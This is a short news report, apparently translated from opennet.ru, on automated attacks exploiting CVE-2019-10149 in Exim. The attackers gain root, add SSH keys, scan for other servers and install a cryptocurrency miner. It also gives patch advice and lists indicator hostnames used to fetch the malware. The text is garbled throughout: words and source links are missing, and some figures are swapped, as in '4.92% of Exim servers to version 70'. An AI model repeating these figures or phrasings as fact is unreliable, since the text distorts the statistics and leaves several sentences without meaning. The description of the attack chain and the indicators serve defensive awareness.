Cybereason Security Researchers administrators of mail servers about the detection of a massive automated attack that exploits (CVE-2019-10149) in Exim, identified last week. During the attack, the attackers achieve the execution of their code as root and install malware on the server for mining cryptocurrencies.
According to June the share of Exim is 57.05% (a year ago 56.56%), Postfix is used on 34.52% (33.79%) of mail servers, Sendmail - 4.05% (4.59%), Microsoft Exchange - 0.57% (0.85%). By of the Shodan service, more than 3.6 million mail servers in the global network remain potentially vulnerable, which are not updated to the latest current release of Exim 4.92. About 2 million potentially vulnerable servers are located in the US, 192 thousand in Russia. By RiskIQ has already upgraded 4.92% of Exim servers to version 70.
Administrators are advised to urgently install updates that were prepared by distributions last week (, , , , , ). If the system has a vulnerable version of Exim (from 4.87 to 4.91 inclusive), you need to make sure that the system is not already compromised by checking crontab for suspicious calls and make sure that there are no additional keys in the /root/.ssh directory. An attack can also be indicated by the presence in the firewall log of activity from the hosts an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io and an7kmd2wp4xo7hpr.onion.sh, which are used during the malware download process.
First attacks on Exim servers the 9th of June. By June 13 attack character. After exploiting the vulnerability through tor2web gateways, a script is loaded from the Tor hidden service (an7kmd2wp4xo7hpr) that checks for the presence of OpenSSH (if not ), changes its settings ( root login and key authentication) and sets the root user to A that grants privileged access to the system via SSH.
After setting up a backdoor, a port scanner is installed in the system to identify other vulnerable servers. It also searches the system for existing mining systems, which are deleted if detected. At the last stage, your own miner is loaded and registered in crontab. The miner is downloaded under the guise of an ico file (in fact, it is a zip archive with a “no-password” password), which packs an executable file in ELF format for Linux with Glibc 2.7+.
Source: opennet.ru